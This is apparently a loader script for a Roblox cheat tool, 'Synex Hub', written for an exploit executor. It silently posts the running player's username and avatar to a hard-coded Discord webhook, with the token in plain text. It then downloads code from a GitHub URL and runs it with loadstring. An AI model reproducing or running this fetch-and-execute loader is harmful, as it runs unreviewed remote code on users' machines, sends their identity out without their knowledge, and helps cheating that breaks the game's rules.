local url = "https://discordapp.com/api/webhooks/1085743126058111076/Rw3fwirZsvG_s_m8itIGzfbpZdObwK36LJC7PDR0hjSuxGahM_oJnNmAZZXHz4Sfj8MU"
local data = {
    ["content"] = game.Players.LocalPlayer.Name .. " executed **Synex Hub Version: 1**",
    ["embeds"] = {
        {
            ["title"] = "Username: " .. game.Players.LocalPlayer.Name,
            ["type"] = "rich",
            ["color"] = tonumber(0x7269da),
            ["image"] = {
                ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                    tostring(game:GetService("Players").LocalPlayer.Name)
            }
        }
    }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
    ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
wait(3)
loadstring(game:HttpGet('https://raw.githubusercontent.com/MCG904YT/6/main/m'))()
